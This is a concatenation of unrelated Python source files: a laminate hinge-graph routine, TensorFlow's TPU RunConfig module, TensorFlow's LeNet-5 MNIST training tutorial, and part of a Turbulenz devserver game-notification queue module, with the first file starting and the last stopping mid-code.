            connections2[line] = Laminate.unaryoperation(geoms, 'union')
        # Bodies overlapping the fixed region become the grounded bodies.
        self.fixed_bodies = []
        fixed_csg = []
        for body, body_generic in zip(bodies, bodies_generic):
            if not fixed.intersection(body).isEmpty():
                self.fixed_bodies.append(body_generic)
                fixed_csg.append(body)
        self.bodies_generic = bodies_generic
        allhingelines.sort()  # Sort here to prevent interfering with geometry. We only care about order of the joint props
        # Keep only hinges connecting exactly two bodies (real joints).
        self.connections = sorted([(key, connections[key]) for key in allhingelines if len(connections[key]) == 2])
        self.all_joint_props = [all_joint_props[key] for key in allhingelines if len(connections[key]) == 2]
        self.output = []
        self.output.append(OperationOutput(safe, 'Safe', self))
        self.output.append(OperationOutput(unsafe, 'Unsafe', self))
        self.output.append(OperationOutput(split1, 'Split1', self))
        self.output.append(OperationOutput(split2, 'Split2', self))
        #TODO Change output to match the names that get exported to Gazebo
        self.output.extend([OperationOutput(item, 'Fixed {0:d}'.format(ii), self) for ii, item in enumerate(fixed_csg)])
        self.output.extend([OperationOutput(item, 'Body {0:d}'.format(ii), self) for ii, item in enumerate(bodies)])
        self.output.extend([OperationOutput(item, 'Connection {0:d}'.format(ii), self) for ii, item in enumerate(connections2.values())])
        # Duplicate Split2 (index 3) at the front as the main displayed output.
        self.output.insert(0, self.output[3])

    def switch_layer_defs(self, layerdef_old, layerdef_new):
        """Return a copy with joint layers remapped to a new layer definition."""
        new = self.copy()
        for joint_def in new.joint_defs:
            joint_def.joint_layer = new.convert_layer_links(
                [joint_def.joint_layer], layerdef_old, layerdef_new)[0]
            joint_def.sublaminate_layers = new.convert_layer_links(
                [joint_def.sublaminate_layers], layerdef_old, layerdef_new)[0]
        return new

    #Returns a key of laminates to generations and assigns the value
    #The original fixed body is generation 0 and all others are children to it.
    def get_laminate_generations(self):
        """Breadth-first walk of the body-connection graph from the first
        fixed body, assigning each body an increasing generation number."""
        current_node = self.fixed_bodies[0]  # The root of the tree
        # Each pair is the two bodies joined by a hinge (see generate()).
        joint_pairs = [my_tuple[1] for my_tuple in self.connections]
        hierarchy_map = {}
        generation = 0  # The generation of the current node
        hierarchy_map[current_node] = generation
        generation += 1
        child_queue = [current_node]
        visited_set = []
        while len(child_queue) > 0:
            current_node = child_queue.pop(0)
            visited_set.append(current_node)
            # Pairs touching the current node; the other member is a child.
            children_tuples = [joint_pair for joint_pair in joint_pairs if current_node in joint_pair]
            children = [[joint for joint in joint_pair if joint != current_node][0] for joint_pair in children_tuples]
            children = [child for child in children if child not in visited_set]
            for child in children:
                hierarchy_map[child] = generation
                generation += 1
            #Queues up the next batch of children
            child_queue.extend([child for child in children if child not in visited_set])
        return hierarchy_map
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""A RunConfig subclass with TPU support."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import os
import numpy as np
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.python.estimator import run_config as run_config_lib
from tensorflow.python.platform import tf_logging as logging
# pylint: disable=protected-access
_TF_CONFIG_ENV = run_config_lib._TF_CONFIG_ENV
_SERVICE_KEY = run_config_lib._SERVICE_KEY
_TPU_WORKER_JOB_NAME = 'tpu_worker_job_name'
_NUM_CORES_PER_HOST = 8
# pylint: enable=protected-access
# TODO(b/72511246) Provide a simplified api to configure model parallelism.
class TPUConfig(
    collections.namedtuple('TPUConfig', [
        'iterations_per_loop',
        'num_shards',
        'computation_shape',
        'per_host_input_for_training',
        'tpu_job_name',
        'initial_infeed_sleep_secs',
    ])):
  r"""TPU related configuration required by `TPUEstimator`.

  Args:
    iterations_per_loop: This is the number of train steps running in TPU
      system before returning to CPU host for each `Session.run`. This means
      global step is increased `iterations_per_loop` times in one `Session.run`.
      It is recommended to be set as number of global steps for next checkpoint.
    num_shards: (Deprecated, ignored by TPUEstimator).
      The number of model replicas in the system. For non-model-parallelism
      case, this number equals the total number of TPU cores. For
      model-parallelism, the total number of TPU cores equals
      product(computation_shape) * num_shards.
    computation_shape: Defaults to `None`, which disables model parallelism. A
      list of size 3 which describes the shape of a model replica's block of
      cores. This is required by model-parallelism which enables partitioning
      the model to multiple cores. For example, [2, 2, 1] means the model is
      partitioned across 4 cores which span two cores in both x and y
      coordinates. Please refer to ${tf.contrib.tpu.TopologyProto} for the
      geometry of a TPU mesh.
    per_host_input_for_training: If `True`, `input_fn` is invoked Per-Host
      rather than Per-Core. With Per-Host input pipeline deployment, `input_fn`
      is invoked once on each host. With Per-Core input pipeline deployment, it
      is invoked once for each core. To be precise, with a global batch size
      `train_batch_size` in `TPUEstimator` constructor, the batch size for each
      shard is `train_batch_size` // #hosts. With Per-Core input pipeline
      deployment, the shard batch size is `train_batch_size` // #cores.
    tpu_job_name: The name of the TPU job. Typically, this name is auto-inferred
      within TPUEstimator, however when using ClusterSpec propagation in more
      esoteric cluster configurations, you may need to specify the job name as a
      string.
    initial_infeed_sleep_secs: The number of seconds the infeed thread should
      wait before enqueueing the first batch. This helps avoid timeouts for
      models that require a long compilation time.

  Raises:
    ValueError: If `iterations_per_loop`, `num_shards`, `computation_shape`,
      or `initial_infeed_sleep_secs` are invalid.
  """

  def __new__(cls,
              iterations_per_loop=2,
              num_shards=None,
              computation_shape=None,
              per_host_input_for_training=True,
              tpu_job_name=None,
              initial_infeed_sleep_secs=None):
    # Check iterations_per_loop.
    util_lib.check_positive_integer(iterations_per_loop,
                                    'TPUConfig iterations_per_loop')
    # Check num_shards.
    if num_shards is not None:
      util_lib.check_positive_integer(num_shards, 'TPUConfig num_shards')
    # Check computation_shape: either None or a length-3 shape.
    if computation_shape is not None and len(computation_shape) != 3:
      raise ValueError(
          'computation_shape must be a list with length 3 or None; got {}'.
          format(str(computation_shape)))
    if computation_shape is not None:
      computation_shape_array = np.asarray(computation_shape, dtype=np.int32)
      # This prevents any computation being replicated across multiple hosts, so
      # that each host feeds the same number of computations.
      if any(computation_shape_array < 1) or any(computation_shape_array > 2):
        raise ValueError('computation_shape elements can only be 1 or 2; got '
                         'computation_shape={}'.format(computation_shape))
    # Check initial_infeed_sleep_secs.
    if initial_infeed_sleep_secs:
      util_lib.check_positive_integer(initial_infeed_sleep_secs,
                                      'TPUConfig initial_infeed_sleep_secs')
    # Fall back to the job name advertised via TF_CONFIG when not given.
    tpu_job_name = tpu_job_name or _get_tpu_job_name_from_tf_config()
    return super(TPUConfig, cls).__new__(
        cls,
        iterations_per_loop=iterations_per_loop,
        num_shards=num_shards,
        computation_shape=computation_shape,
        per_host_input_for_training=per_host_input_for_training,
        tpu_job_name=tpu_job_name,
        initial_infeed_sleep_secs=initial_infeed_sleep_secs)
class RunConfig(run_config_lib.RunConfig):
  """RunConfig with TPU support."""

  def __init__(self,
               tpu_config=None,
               evaluation_master=None,
               master=None,
               **kwargs):
    """Constructs a RunConfig.

    Args:
      tpu_config: the TPUConfig that specifies TPU-specific configuration.
      evaluation_master: a string. The address of the master to use for eval.
        Defaults to master if not set.
      master: a string. The address of the master to use for training.
      **kwargs: keyword config parameters.
    """
    super(RunConfig, self).__init__(**kwargs)
    self._tpu_config = tpu_config or TPUConfig()
    # An explicitly passed master/evaluation_master (even the empty string)
    # wins over whatever the parent class derived from the environment.
    if master is not None:
      self._master = master
    if evaluation_master is not None:
      self._evaluation_master = evaluation_master
      return
    if self._evaluation_master:
      return
    if self.task_type == run_config_lib.TaskType.EVALUATOR:
      # A cluster manager set TF_CONFIG (task type EVALUATOR); respect it.
      return
    # No cluster manager and no explicit value: default the eval master to
    # the training master for a better standalone experience.
    self._evaluation_master = self._master

  @property
  def evaluation_master(self):
    return self._evaluation_master

  @property
  def master(self):
    return self._master

  @property
  def tpu_config(self):
    return self._tpu_config

  def replace(self, **kwargs):
    """Like RunConfig.replace, but carries tpu_config over manually because
    the parent class does not know about that attribute."""
    if 'tpu_config' not in kwargs:
      return super(RunConfig, self).replace(**kwargs)
    new_tpu_config = kwargs.pop('tpu_config')
    new_instance = super(RunConfig, self).replace(**kwargs)
    new_instance._tpu_config = new_tpu_config  # pylint: disable=protected-access
    return new_instance
def _get_tpu_job_name_from_tf_config():
  """Returns the TPU worker job name encoded in TF_CONFIG, if any."""
  # TODO(xiejw): Extends this to support both TF_CONFIG env variable and cluster
  # spec propagation.
  raw_tf_config = os.environ.get(_TF_CONFIG_ENV, '{}')
  service_config = json.loads(raw_tf_config).get(_SERVICE_KEY, {})
  tpu_job_name = service_config.get(_TPU_WORKER_JOB_NAME)
  if tpu_job_name:
    logging.info('Load TPU job name from TF_CONFIG: %s', tpu_job_name)
  return tpu_job_name
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple, end-to-end, LeNet-5-like convolutional MNIST model example.
This should achieve a test error of 0.7%. Please keep this model as simple and
linear as possible, it is meant as a tutorial for simple convolutional models.
Run with --self_test on the command line to execute a short self-test.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import gzip
import os
import sys
import time
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# CVDF mirror of http://yann.lecun.com/exdb/mnist/
SOURCE_URL = 'https://storage.googleapis.com/cvdf-datasets/mnist/'
WORK_DIRECTORY = 'data'
IMAGE_SIZE = 28
NUM_CHANNELS = 1
PIXEL_DEPTH = 255
NUM_LABELS = 10
VALIDATION_SIZE = 5000 # Size of the validation set.
SEED = 66478 # Set to None for random seed.
BATCH_SIZE = 64
NUM_EPOCHS = 10
EVAL_BATCH_SIZE = 64
EVAL_FREQUENCY = 100 # Number of steps between evaluations.
FLAGS = None
def data_type():
  """Dtype for activations, weights, and placeholders (fp16 behind a flag)."""
  return tf.float16 if FLAGS.use_fp16 else tf.float32
def maybe_download(filename):
  """Fetch `filename` from the MNIST mirror unless it is already cached.

  Returns the local path of the (possibly just downloaded) file.
  """
  if not tf.gfile.Exists(WORK_DIRECTORY):
    tf.gfile.MakeDirs(WORK_DIRECTORY)
  filepath = os.path.join(WORK_DIRECTORY, filename)
  if tf.gfile.Exists(filepath):
    return filepath
  # Not cached yet: download, then report the size we got.
  filepath, _ = urllib.request.urlretrieve(SOURCE_URL + filename, filepath)
  with tf.gfile.GFile(filepath) as f:
    size = f.size()
  print('Successfully downloaded', filename, size, 'bytes.')
  return filepath
def extract_data(filename, num_images):
  """Read `num_images` MNIST images from a gzip file into a float32 4D tensor.

  Output axes are [image index, y, x, channels]; pixel values are rescaled
  from [0, 255] to [-0.5, 0.5].
  """
  print('Extracting', filename)
  num_bytes = IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS
  with gzip.open(filename) as bytestream:
    bytestream.read(16)  # skip the 16-byte IDX header
    buf = bytestream.read(num_bytes)
  pixels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)
  pixels = (pixels - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH
  return pixels.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)
def extract_labels(filename, num_images):
  """Read `num_images` MNIST labels from a gzip file into an int64 vector."""
  print('Extracting', filename)
  with gzip.open(filename) as bytestream:
    bytestream.read(8)  # skip the 8-byte IDX header
    buf = bytestream.read(1 * num_images)
  return numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)
def fake_data(num_images):
  """Synthesize a deterministic MNIST-shaped dataset for self-tests.

  Labels alternate 0/1 and every pixel of an image equals label - 0.5.
  """
  data = numpy.ndarray(
      shape=(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS),
      dtype=numpy.float32)
  labels = numpy.zeros(shape=(num_images,), dtype=numpy.int64)
  for index in xrange(num_images):
    label = index % 2
    data[index, :, :, 0] = label - 0.5
    labels[index] = label
  return data, labels
def error_rate(predictions, labels):
  """Percent of rows in `predictions` whose argmax disagrees with `labels`."""
  num_correct = numpy.sum(numpy.argmax(predictions, 1) == labels)
  return 100.0 - (100.0 * num_correct / predictions.shape[0])
def main(_):
  """Build the LeNet-5-like graph, train it on MNIST, and report test error."""
  if FLAGS.self_test:
    # Self-test mode: tiny synthetic dataset, one epoch.
    print('Running self-test.')
    train_data, train_labels = fake_data(256)
    validation_data, validation_labels = fake_data(EVAL_BATCH_SIZE)
    test_data, test_labels = fake_data(EVAL_BATCH_SIZE)
    num_epochs = 1
  else:
    # Get the data.
    train_data_filename = maybe_download('train-images-idx3-ubyte.gz')
    train_labels_filename = maybe_download('train-labels-idx1-ubyte.gz')
    test_data_filename = maybe_download('t10k-images-idx3-ubyte.gz')
    test_labels_filename = maybe_download('t10k-labels-idx1-ubyte.gz')
    # Extract it into numpy arrays.
    train_data = extract_data(train_data_filename, 60000)
    train_labels = extract_labels(train_labels_filename, 60000)
    test_data = extract_data(test_data_filename, 10000)
    test_labels = extract_labels(test_labels_filename, 10000)
    # Generate a validation set from the head of the training data.
    validation_data = train_data[:VALIDATION_SIZE, ...]
    validation_labels = train_labels[:VALIDATION_SIZE]
    train_data = train_data[VALIDATION_SIZE:, ...]
    train_labels = train_labels[VALIDATION_SIZE:]
    num_epochs = NUM_EPOCHS
  train_size = train_labels.shape[0]

  # This is where training samples and labels are fed to the graph.
  # These placeholder nodes will be fed a batch of training data at each
  # training step using the {feed_dict} argument to the Run() call below.
  train_data_node = tf.placeholder(
      data_type(),
      shape=(BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
  train_labels_node = tf.placeholder(tf.int64, shape=(BATCH_SIZE,))
  eval_data = tf.placeholder(
      data_type(),
      shape=(EVAL_BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))

  # The variables below hold all the trainable weights. They are passed an
  # initial value which will be assigned when we call:
  # {tf.global_variables_initializer().run()}
  conv1_weights = tf.Variable(
      tf.truncated_normal([5, 5, NUM_CHANNELS, 32],  # 5x5 filter, depth 32.
                          stddev=0.1,
                          seed=SEED, dtype=data_type()))
  conv1_biases = tf.Variable(tf.zeros([32], dtype=data_type()))
  conv2_weights = tf.Variable(tf.truncated_normal(
      [5, 5, 32, 64], stddev=0.1,
      seed=SEED, dtype=data_type()))
  conv2_biases = tf.Variable(tf.constant(0.1, shape=[64], dtype=data_type()))
  fc1_weights = tf.Variable(  # fully connected, depth 512.
      tf.truncated_normal([IMAGE_SIZE // 4 * IMAGE_SIZE // 4 * 64, 512],
                          stddev=0.1,
                          seed=SEED,
                          dtype=data_type()))
  fc1_biases = tf.Variable(tf.constant(0.1, shape=[512], dtype=data_type()))
  fc2_weights = tf.Variable(tf.truncated_normal([512, NUM_LABELS],
                                                stddev=0.1,
                                                seed=SEED,
                                                dtype=data_type()))
  fc2_biases = tf.Variable(tf.constant(
      0.1, shape=[NUM_LABELS], dtype=data_type()))

  # We will replicate the model structure for the training subgraph, as well
  # as the evaluation subgraphs, while sharing the trainable parameters.
  def model(data, train=False):
    """The Model definition: two conv/pool stages then two FC layers."""
    # 2D convolution, with 'SAME' padding (i.e. the output feature map has
    # the same size as the input). Note that {strides} is a 4D array whose
    # shape matches the data layout: [image index, y, x, depth].
    conv = tf.nn.conv2d(data,
                        conv1_weights,
                        strides=[1, 1, 1, 1],
                        padding='SAME')
    # Bias and rectified linear non-linearity.
    relu = tf.nn.relu(tf.nn.bias_add(conv, conv1_biases))
    # Max pooling. The kernel size spec {ksize} also follows the layout of
    # the data. Here we have a pooling window of 2, and a stride of 2.
    pool = tf.nn.max_pool(relu,
                          ksize=[1, 2, 2, 1],
                          strides=[1, 2, 2, 1],
                          padding='SAME')
    conv = tf.nn.conv2d(pool,
                        conv2_weights,
                        strides=[1, 1, 1, 1],
                        padding='SAME')
    relu = tf.nn.relu(tf.nn.bias_add(conv, conv2_biases))
    pool = tf.nn.max_pool(relu,
                          ksize=[1, 2, 2, 1],
                          strides=[1, 2, 2, 1],
                          padding='SAME')
    # Reshape the feature map cuboid into a 2D matrix to feed it to the
    # fully connected layers.
    pool_shape = pool.get_shape().as_list()
    reshape = tf.reshape(
        pool,
        [pool_shape[0], pool_shape[1] * pool_shape[2] * pool_shape[3]])
    # Fully connected layer. Note that the '+' operation automatically
    # broadcasts the biases.
    hidden = tf.nn.relu(tf.matmul(reshape, fc1_weights) + fc1_biases)
    # Add a 50% dropout during training only. Dropout also scales
    # activations such that no rescaling is needed at evaluation time.
    if train:
      hidden = tf.nn.dropout(hidden, 0.5, seed=SEED)
    return tf.matmul(hidden, fc2_weights) + fc2_biases

  # Training computation: logits + cross-entropy loss.
  logits = model(train_data_node, True)
  loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
      labels=train_labels_node, logits=logits))
  # L2 regularization for the fully connected parameters.
  regularizers = (tf.nn.l2_loss(fc1_weights) + tf.nn.l2_loss(fc1_biases) +
                  tf.nn.l2_loss(fc2_weights) + tf.nn.l2_loss(fc2_biases))
  # Add the regularization term to the loss.
  loss += 5e-4 * regularizers

  # Optimizer: set up a variable that's incremented once per batch and
  # controls the learning rate decay.
  batch = tf.Variable(0, dtype=data_type())
  # Decay once per epoch, using an exponential schedule starting at 0.01.
  learning_rate = tf.train.exponential_decay(
      0.01,                # Base learning rate.
      batch * BATCH_SIZE,  # Current index into the dataset.
      train_size,          # Decay step.
      0.95,                # Decay rate.
      staircase=True)
  # Use simple momentum for the optimization.
  optimizer = tf.train.MomentumOptimizer(learning_rate,
                                         0.9).minimize(loss,
                                                       global_step=batch)

  # Predictions for the current training minibatch.
  train_prediction = tf.nn.softmax(logits)
  # Predictions for the test and validation, which we'll compute less often.
  eval_prediction = tf.nn.softmax(model(eval_data))

  # Small utility function to evaluate a dataset by feeding batches of data to
  # {eval_data} and pulling the results from {eval_predictions}.
  # Saves memory and enables this to run on smaller GPUs.
  def eval_in_batches(data, sess):
    """Get all predictions for a dataset by running it in small batches."""
    size = data.shape[0]
    if size < EVAL_BATCH_SIZE:
      raise ValueError("batch size for evals larger than dataset: %d" % size)
    predictions = numpy.ndarray(shape=(size, NUM_LABELS), dtype=numpy.float32)
    for begin in xrange(0, size, EVAL_BATCH_SIZE):
      end = begin + EVAL_BATCH_SIZE
      if end <= size:
        predictions[begin:end, :] = sess.run(
            eval_prediction,
            feed_dict={eval_data: data[begin:end, ...]})
      else:
        # Final partial batch: run a full-size batch from the tail and keep
        # only the rows belonging to this slice.
        batch_predictions = sess.run(
            eval_prediction,
            feed_dict={eval_data: data[-EVAL_BATCH_SIZE:, ...]})
        predictions[begin:, :] = batch_predictions[begin - size:, :]
    return predictions

  # Create a local session to run the training.
  start_time = time.time()
  with tf.Session() as sess:
    # Run all the initializers to prepare the trainable parameters.
    tf.global_variables_initializer().run()
    print('Initialized!')
    # Loop through training steps.
    for step in xrange(int(num_epochs * train_size) // BATCH_SIZE):
      # Compute the offset of the current minibatch in the data.
      # Note that we could use better randomization across epochs.
      offset = (step * BATCH_SIZE) % (train_size - BATCH_SIZE)
      batch_data = train_data[offset:(offset + BATCH_SIZE), ...]
      batch_labels = train_labels[offset:(offset + BATCH_SIZE)]
      # This dictionary maps the batch data (as a numpy array) to the
      # node in the graph it should be fed to.
      feed_dict = {train_data_node: batch_data,
                   train_labels_node: batch_labels}
      # Run the optimizer to update weights.
      sess.run(optimizer, feed_dict=feed_dict)
      # print some extra information once reach the evaluation frequency
      if step % EVAL_FREQUENCY == 0:
        # fetch some extra nodes' data
        l, lr, predictions = sess.run([loss, learning_rate, train_prediction],
                                      feed_dict=feed_dict)
        elapsed_time = time.time() - start_time
        start_time = time.time()
        print('Step %d (epoch %.2f), %.1f ms' %
              (step, float(step) * BATCH_SIZE / train_size,
               1000 * elapsed_time / EVAL_FREQUENCY))
        print('Minibatch loss: %.3f, learning rate: %.6f' % (l, lr))
        print('Minibatch error: %.1f%%' % error_rate(predictions, batch_labels))
        print('Validation error: %.1f%%' % error_rate(
            eval_in_batches(validation_data, sess), validation_labels))
        sys.stdout.flush()
    # Finally print the result!
    test_error = error_rate(eval_in_batches(test_data, sess), test_labels)
    print('Test error: %.1f%%' % test_error)
    if FLAGS.self_test:
      print('test_error', test_error)
      assert test_error == 0.0, 'expected 0.0 test_error, got %.2f' % (
          test_error,)
if __name__ == '__main__':
  # Parse only the flags this script owns; anything unrecognized is forwarded
  # to tf.app.run via argv.
  parser = argparse.ArgumentParser()
  parser.add_argument(
      '--use_fp16',
      default=False,
      help='Use half floats instead of full floats if True.',
      action='store_true')
  parser.add_argument(
      '--self_test',
      default=False,
      action='store_true',
      help='True if running a self test.')
  FLAGS, unparsed = parser.parse_known_args()
  tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| |
# Copyright (c) 2011-2013 Turbulenz Limited
import logging
LOG = logging.getLogger(__name__)
from collections import defaultdict
from os import access, R_OK, remove as remove_file, listdir
from os.path import join as join_path, normpath as norm_path
from threading import Lock
from time import time as get_time
from simplejson import JSONEncoder, JSONDecoder
from turbulenz_local.lib.exceptions import ApiException
# pylint: disable=F0401
import yaml
from yaml import YAMLError
from pylons import config
# pylint: enable=F0401
from turbulenz_local.tools import get_absolute_path, create_dir
# pylint: disable=C0103
_json_decoder = JSONDecoder()
_json_encoder = JSONEncoder()
# pylint: enable=C0103
REQUIRED_NOTIFICATION_KEYS = ['key', 'title']
class GameNotificationsUnsupportedException(Exception):
    """Raised when notifications are unavailable (no readable
    gamenotifications.yaml for the game, or no notifications_db configured)."""
    pass
class GameNotificationPathError(Exception):
    """Raised when the on-disk notification queue folder cannot be created."""
class GameNotificationTaskError(Exception):
    """Raised when a queued notification task cannot be written to disk."""
class GameNotificationSettingsError(Exception):
    """Raised when notificationsettings.yaml cannot be read or written."""
class GameNotificationKeys(object):
    """Notification key definitions of a game, loaded from its folder.

    Reads ``gamenotifications.yaml``; each entry must carry at least the
    REQUIRED_NOTIFICATION_KEYS fields.

    Raises GameNotificationsUnsupportedException when the yaml file is
    absent/unreadable, ApiException when it cannot be parsed.
    """

    def __init__(self, game):
        self.game = game
        self.abs_game_path = get_absolute_path(game.path)
        try:
            yaml_path = norm_path(get_absolute_path(join_path(game.path, 'gamenotifications.yaml')))
            if not access(yaml_path, R_OK):
                # No file simply means the game does not use notifications.
                raise GameNotificationsUnsupportedException()
            with open(unicode(yaml_path), 'r') as f:
                notifications = {}
                # safe_load: the yaml comes from game content and must not be
                # able to instantiate arbitrary Python objects (yaml.load can).
                for n_key in yaml.safe_load(f):
                    notifications[n_key['key']] = n_key
                self._notifications = notifications
        # TypeError covers a non-iterable (e.g. empty) document; YAMLError
        # covers malformed yaml — both should surface as ApiException like
        # the other load failures rather than escaping unwrapped.
        except (IOError, KeyError, TypeError, YAMLError) as e:
            LOG.error('Failed loading gamenotifications: %s', str(e))
            raise ApiException('Failed loading gamenotifications.yaml file %s' % str(e))

    def get_key(self, key):
        """Return the definition dict for *key*, or None if unknown."""
        return self._notifications.get(key)

    def to_dict(self):
        """Return the raw mapping of key name -> definition."""
        return self._notifications

    def validate(self):
        """Return [(identifier, {'errors': [...]})] for each bad entry."""
        result = []
        count = 0
        for notification in self._notifications.values():
            count += 1
            errors = []
            # collect keys that are missing from the badge or are not filled in
            for key in REQUIRED_NOTIFICATION_KEYS:
                if not notification.get(key):
                    errors.append('missing key: "%s"' % key)
            identifier = notification.get('title', notification.get('key', 'Badge #%i' % count))
            if errors:
                result.append((identifier, {'errors': errors}))
        return result
class GameNotificationKeysList(object):
    """Lazy per-slug cache of GameNotificationKeys instances."""

    notification_key_dict = {}

    ## do some lazy loading here
    @classmethod
    def load(cls, game):
        """Read the keys for *game* from disk and cache them by slug."""
        keys = GameNotificationKeys(game)
        cls.notification_key_dict[game.slug] = keys
        return keys

    @classmethod
    def get(cls, game):
        """Return the cached keys for *game*, loading on first access."""
        cached = cls.notification_key_dict.get(game.slug)
        if cached is not None:
            return cached
        return cls.load(game)

    @classmethod
    def reset(cls):
        """Drop every cached entry."""
        cls.notification_key_dict = {}
def _get_task_path(slug, recipient, notification_type, filename=None):
    """Build (and create if needed) the queue folder for notification tasks.

    Returns the folder path, or the absolute path of *filename* inside it
    when a filename is supplied.
    """
    try:
        base = config['notifications_db']
    except KeyError:
        raise GameNotificationsUnsupportedException('notifications_db path config variable not set')
    task_dir = join_path(base, slug, recipient, notification_type)
    if not create_dir(task_dir):
        raise GameNotificationPathError('User GameNotification path "%s" could not be created.' % task_dir)
    if not filename:
        return task_dir
    return get_absolute_path(join_path(task_dir, filename))
def _load_tasks(slug, recipient, notification_type):
    """Load every queued task file for (slug, recipient, notification_type).

    Returns (tasks sorted by send time, set of task ids, per-sender counts).
    Unreadable or malformed task files are logged and skipped.
    """
    tasks = []
    # defaultdict(int) is the idiomatic zero-counter (was defaultdict(lambda: 0)).
    num_tasks_per_sender = defaultdict(int)
    task_ids = set()
    task_path = _get_task_path(slug, recipient, notification_type)
    for task_file in listdir(task_path):
        file_path = join_path(task_path, task_file)
        try:
            with open(file_path, 'rb') as f:
                json_dict = _json_decoder.decode(f.read())
            # TypeError (caught below) covers files whose json does not match
            # the GameNotificationTask constructor signature.
            task = GameNotificationTask(**json_dict)
            task_ids.add(task.task_id)
            tasks.append(task)
            num_tasks_per_sender[task.sender] += 1
        except (IOError, OSError, TypeError) as e:
            LOG.error('Failed loading GameNotificationTask "%s": %s', file_path, str(e))
    # Keep the queue ordered by send time; key arg renamed so it no longer
    # shadows the loop variable above.
    tasks.sort(key=lambda t: t.time)
    return tasks, task_ids, num_tasks_per_sender
class GameNotificationTask(object):
    """
    GameNotificationTask represents a notification as it sits in the waiting-queue before being sent (polled)
    Here on the devserver it sits in a text-file in the userdata folder
    """

    INSTANT = 'instant'
    DELAYED = 'delayed'

    # Maximum queued tasks per sender for each delivery type.
    LIMIT = {
        INSTANT: 1,
        DELAYED: 8
    }

    def __init__(self, slug, task_id, key, sender, recipient, msg, time):
        self.task_id = task_id
        self.slug = slug
        self.key = key
        self.sender = sender
        self.recipient = recipient
        self.msg = msg
        self.time = time

    @property
    def notification_type(self):
        """'delayed' when a send time is set, 'instant' otherwise."""
        if self.time:
            return self.DELAYED
        return self.INSTANT

    def save(self):
        """Serialise the task to its queue file.

        Raises GameNotificationTaskError when the file cannot be written.
        """
        try:
            with open(self.get_path(), 'wb') as f:
                f.write(_json_encoder.encode(self.__dict__))
        # 'as e' replaces the Py2-only 'except IOError, e' for consistency
        # with every other handler in this module.
        except IOError as e:
            error_msg = 'Failed writing GameNotificationTask: %s' % str(e)
            LOG.error(error_msg)
            raise GameNotificationTaskError(error_msg)

    def to_notification(self):
        """Return the wire-format dict delivered to the client."""
        return {
            'key': self.key,
            'sender': self.sender,
            'msg': self.msg,
            'sent': self.time or get_time()
        }

    def get_path(self):
        """Absolute path of this task's queue file."""
        filename = str(self.task_id) + '.txt'
        return _get_task_path(self.slug, self.recipient, self.notification_type, filename)

    def remove(self):
        """Delete this task's queue file from disk."""
        remove_file(self.get_path())
class GameNotificationTaskList(object):
    """Pending notification tasks for one (game slug, recipient) pair.

    Tasks are bucketed by delivery type ('instant' / 'delayed'); each bucket
    is kept sorted by ascending send time so polling can stop at the first
    task that is not yet due.
    """

    def __init__(self, slug, recipient):
        object.__init__(self)
        self._slug = slug
        self._recipient = recipient
        self._lock = Lock()
        instant = GameNotificationTask.INSTANT
        delayed = GameNotificationTask.DELAYED
        instant_tasks, instant_task_ids, num_instant_tasks_per_sender = \
            _load_tasks(slug, recipient, instant)
        delayed_tasks, delayed_task_ids, num_delayed_tasks_per_sender = \
            _load_tasks(slug, recipient, delayed)
        # Parallel per-type state: ordered task lists, id sets for fast
        # membership tests, and per-sender counts for quota enforcement.
        self._tasks = {
            instant: instant_tasks,
            delayed: delayed_tasks
        }
        self._task_ids = {
            instant: instant_task_ids,
            delayed: delayed_task_ids
        }
        self._num_tasks_per_sender = {
            instant: num_instant_tasks_per_sender,
            delayed: num_delayed_tasks_per_sender
        }

    def add_task(self, task):
        """Persist *task* and queue it in send-time order.

        Returns False (without saving) when the sender already has the
        maximum number of queued tasks of this type.
        """
        notification_type = task.notification_type
        sender = task.sender
        if self._num_tasks_per_sender[notification_type][sender] >= task.LIMIT[notification_type]:
            return False
        with self._lock:
            ## save task to disk
            task.save()
            # Insert before the first task due later. Default to appending:
            # the previous enumerate-and-break scan left 'index' pointing at
            # the last position when no later task existed and wrongly
            # inserted the new task before the final element.
            tasks = self._tasks[notification_type]
            index = len(tasks)
            for pos, queued in enumerate(tasks):
                if queued.time > task.time:
                    index = pos
                    break
            tasks.insert(index, task)
            self._task_ids[notification_type].add(task.task_id)
            self._num_tasks_per_sender[notification_type][sender] += 1
        return True

    def poll_latest(self):
        """Pop and return (as client dicts) every task due by now."""
        current_time = get_time()
        tasks = []
        tasks_to_delete = []
        for tasks_by_type in self._tasks.values():
            for task in tasks_by_type:
                if current_time < task.time:
                    # Lists are time-sorted, so nothing later can be due.
                    break
                tasks.append(task.to_notification())
                tasks_to_delete.append(task)
        for task in tasks_to_delete:
            self.remove_task(task)
        return tasks

